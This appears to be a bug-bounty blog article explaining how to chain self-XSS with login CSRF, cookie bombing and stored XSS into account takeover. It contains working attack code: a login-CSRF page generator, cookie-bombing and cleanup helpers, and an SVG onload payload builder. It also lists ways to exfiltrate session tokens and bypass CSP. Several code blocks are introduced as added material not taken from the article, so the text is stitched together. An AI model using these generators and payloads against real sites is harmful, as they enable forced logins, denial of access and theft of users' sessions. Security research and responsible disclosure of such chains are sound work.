BIPI

Self-XSS to ATO: Login CSRF, Cookie Bombing, and Stored Pivots

Cybersecurity

Self-XSS is dismissed as noise, but with login CSRF and cookie bombing it turns into account takeover on real targets. This guide chains the parts: force the victim into your session, fire the self-XSS, escalate to stored, exfiltrate, and pivot back to their account.

By Arjun Raghavan, Security & Systems Lead, BIPI · February 11, 2023 · 9 min read

#xss #bug-bounty #csrf #ato #web-security

Why Self-XSS Is Not Always Noise

Self-XSS by itself rarely qualifies. The bug bounty unlock is chaining it with login CSRF so the victim runs your JavaScript inside your session, then pivots back to theirs through a stored sink or token theft.

Login CSRF

If the login form carries no CSRF token, or accepts a POST that silently replaces an existing session with a new one, you can force the victim's browser into your account. Login forms are often left out of CSRF protection because logging someone into the attacker's account looks harmless, which is exactly why this primitive is so common in real apps. Ways in:

  • Auto-submitted form posting attacker credentials
  • Endpoint that accepts an authentication token in a query string
  • OAuth flow without state that lands on a known account
  • Magic link clicked from a page under your control
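The first two list items as working PoC generators, added for this article and not code from it or from BIPI. The target URL, field names and credentials are placeholders; the generator only covers a plain form-encoded POST (a JSON login body needs a different trick and usually a CORS misconfiguration).

```javascript
// Added example: a small login-CSRF PoC generator in the spirit of Burp's, written for
// this article rather than taken from it. The target URL, field names and credentials
// below are placeholders; replace them with the real login form's.

// Escape a value for a double-quoted HTML attribute so a password containing quotes or
// angle brackets cannot break out of the form markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Classic variant: a hidden form carrying the attacker's credentials that posts itself
// on load. Works when the endpoint accepts a plain form-encoded POST with no anti-CSRF
// token and does not refuse a login while another session exists. If the form honours a
// return-URL field, point it at the page that carries the self-XSS so the victim lands on
// the payload straight after the forced login.
function buildLoginCsrfPoc({ action, method = 'POST', fields }) {
  const inputs = Object.entries(fields)
    .map(([n, v]) => `  <input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}">`)
    .join('\n');
  return [
    '<!doctype html>',
    '<html><body>',
    `<form id="f" action="${escapeHtml(action)}" method="${escapeHtml(method)}">`,
    inputs,
    '</form>',
    '<script>document.getElementById("f").submit();</script>',
    '</body></html>',
  ].join('\n');
}

// Query-string variant: when a token in the URL logs the browser in, a top-level
// navigation is enough. A meta refresh keeps the PoC free of JavaScript entirely.
function buildTokenLoginPoc(loginUrl, token, param = 'token') {
  const u = new URL(loginUrl);
  u.searchParams.set(param, token);
  return `<!doctype html>\n<meta http-equiv="refresh" content="0;url=${escapeHtml(u.href)}">`;
}

// Usage with placeholder values; `next` is assumed to be the form's return-URL field.
const poc = buildLoginCsrfPoc({
  action: 'https://target.example/login',
  fields: { username: 'attacker', password: 'p"w<d', next: '/settings/profile' },
});
```

Serve the generated page from a host you control and have the victim open it. Browsers that default cookies to SameSite=Lax still send the login response's new Set-Cookie for a top-level form POST, which is why the PoC navigates the whole tab rather than posting into a hidden iframe.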

Cookie Bombing as a Helper

Cookie bombing needs a way to set cookies on the target's registrable domain or a sibling subdomain first: an XSS on a subdomain, a CRLF injection into Set-Cookie, or an endpoint that reflects input into a cookie. Plant enough oversized cookies that the Cookie header exceeds the server's limit (commonly around 8 KB) and every request carrying them fails with a 400 or 431 before the app sees it, so the victim is effectively logged out. Scope the bombs with a Path attribute so only the routes you need break and the login route stays reachable, then redirect the victim into your login flow so they land in your account smoothly. Clear the bombs afterwards (Max-Age=0 with the same Domain and Path) or the rest of the chain cannot load.
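Cookie-bombing helpers, added for this article and not taken from it. They assume you already hold a cookie-setting primitive on the target's domain; the functions write through whatever `doc` you pass, so the same code runs against the real `document` in a browser or against the in-memory jar below when you want to size the bomb and check the Path scoping offline. The 8192-byte limit and the domain and path names are assumptions.

```javascript
// Added example: cookie-bombing helpers written for this article, not taken from it.
// Assumes a cookie-setting primitive on the target's registrable domain or a sibling
// subdomain already exists; `doc` is the real `document` in the browser or the jar below.

const CHUNK = 4000;          // per-cookie value size, under the ~4096-byte per-cookie cap
const HEADER_LIMIT = 8192;   // common default request-header limit (nginx, Apache, Tomcat)

// Plant enough cookies on `domain`/`path` that the Cookie header on matching requests
// exceeds `limit`, so the server answers 400/431 before the app sees the request.
// Returns the names used so the bombs can be removed again.
function bombCookies(doc, { domain, path = '/', limit = HEADER_LIMIT, prefix = 'cb' }) {
  const count = Math.ceil((limit + 1) / CHUNK);
  const value = 'A'.repeat(CHUNK);
  const names = [];
  for (let i = 0; i < count; i++) {
    const name = `${prefix}${i}`;
    doc.cookie = `${name}=${value}; Domain=${domain}; Path=${path}; Max-Age=600`;
    names.push(name);
  }
  return names;
}

// Remove the bombs once the victim is inside your session. Domain and Path must match
// the originals exactly or the browser keeps the old cookies and the site stays broken.
function defuseCookies(doc, names, { domain, path = '/' }) {
  for (const name of names) {
    doc.cookie = `${name}=; Domain=${domain}; Path=${path}; Max-Age=0`;
  }
}

// Minimal stand-in for document.cookie: one cookie per name/path, Max-Age=0 deletes,
// and headerFor() builds the Cookie header a request to `reqPath` would carry using
// RFC 6265 path matching. Enough to size a bomb and confirm which routes it hits.
class MemoryCookieJar {
  constructor() { this.store = new Map(); }
  set cookie(str) {
    const [pair, ...attrs] = str.split(';').map((s) => s.trim());
    const eq = pair.indexOf('=');
    const name = pair.slice(0, eq);
    const value = pair.slice(eq + 1);
    const opts = Object.fromEntries(attrs.map((a) => {
      const [k, v = ''] = a.split('=');
      return [k.toLowerCase(), v];
    }));
    const path = opts.path || '/';
    const key = `${name}|${path}`;
    if (opts['max-age'] === '0') this.store.delete(key);
    else this.store.set(key, { name, value, path });
  }
  get cookie() { return this.headerFor('/'); }
  headerFor(reqPath) {
    return [...this.store.values()]
      .filter(({ path }) => reqPath === path
        || reqPath.startsWith(path.endsWith('/') ? path : path + '/'))
      .map(({ name, value }) => `${name}=${value}`)
      .join('; ');
  }
}
```

Run `bombCookies(document, { domain: 'target.example', path: '/account' })` from the primitive you hold, keep the login route outside the bombed path, and call `defuseCookies` with the same options once the forced login has landed.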

The Pivot Back

Inside your session, your payload runs in the victim's browser but with your account's data. To pivot, you need a sink the victim will render in their own session, and the chain only earns its keep when that write needs the victim's browser: state the app keeps client-side (localStorage, IndexedDB, a saved draft) and renders unsafely after login, or a server-side record bound to the victim's device or IP rather than to the account. A sink you could write from your own account without the victim would not need the chain at all. Write the stored XSS there; when they log back in and visit, the stored payload fires in their context.

Token Exfiltration Patterns

  • document.cookie if HttpOnly is missing
  • fetch /api/me and exfil the body via image beacon
  • Read CSRF token from a meta tag, then make state-changing calls
  • Steal session storage tokens used by SPA auth

Stored XSS Without a Rich Text Editor

Look for SVG uploads, file names rendered without encoding, markdown previews, email templates, and notification bodies. Many apps escape one place and forget another.

Bypass Tricks That Still Work

  • javascript: in href attributes after a redirect
  • SVG with onload inside an avatar upload
  • CSP bypass via JSONP endpoints on the same origin
  • DOM XSS through unsafe template helpers
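The SVG avatar trick from the list above, together with the check a practitioner runs before claiming it, added for this article and not code from it. The payload is the smallest SVG that executes, and the header check says whether the uploaded file is actually served in a way that renders it as a scriptable document; the header names are what browsers key on, the CSP test is deliberately crude, and nothing here tells you which origin the file is served from.

```javascript
// Added example, not from the article: a minimal SVG avatar payload plus a check of the
// response headers the upload is served with, which decide whether onload ever runs.

// Smallest useful SVG. The handler runs only when the file is rendered as an SVG
// document, i.e. opened directly or via <iframe>/<object>; inside <img> no script executes.
function svgPayload(js) {
  return `<svg xmlns="http://www.w3.org/2000/svg" onload="${js.replace(/"/g, '&quot;')}"></svg>`;
}

// Given the response headers of the uploaded file (plain object, lower-cased names),
// report whether a direct navigation would render it as a scriptable SVG document and,
// if not, which header blocks it.
function svgRendersInline(headers) {
  const ct = (headers['content-type'] || '').split(';')[0].trim().toLowerCase();
  const cd = (headers['content-disposition'] || '').toLowerCase();
  const csp = (headers['content-security-policy'] || '').toLowerCase();
  const reasons = [];
  if (ct !== 'image/svg+xml') {
    reasons.push(`served as ${ct || 'no content-type'}, not image/svg+xml`);
  }
  if (cd.startsWith('attachment')) {
    reasons.push('Content-Disposition: attachment forces a download');
  }
  // Crude: a per-file CSP that forbids script or sandboxes the document stops the payload.
  if (csp.includes("script-src 'none'") || csp.includes('sandbox')) {
    reasons.push('CSP on the file blocks inline script');
  }
  return { exploitable: reasons.length === 0, reasons };
}
```

Also confirm the file is served from the application's own origin: an upload host on a separate sandbox domain gives you script execution that cannot read the victim's session, which is worthless for this chain.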

Tooling

  • Burp's CSRF PoC generator
  • DOM Invader for DOM sinks
  • Trufflehog for hardcoded keys you can use for cleaner PoCs
  • Local interactsh for blind exfil

Reporting a Chain Well

Show the whole chain in one uncut video: force-login the victim, fire the payload, then log out, log in as the victim, and watch the stored payload exfiltrate their session. A single recording that runs end to end earns trust at triage.

Self-XSS is a bug bounty asset only when paired with the workflow that places the victim inside your session at the right moment.

Closing

The classic chains are not new but they keep paying because each piece is usually owned by a different team. Login flow, profile rendering, and CSP all need to be wrong together, and they often are.
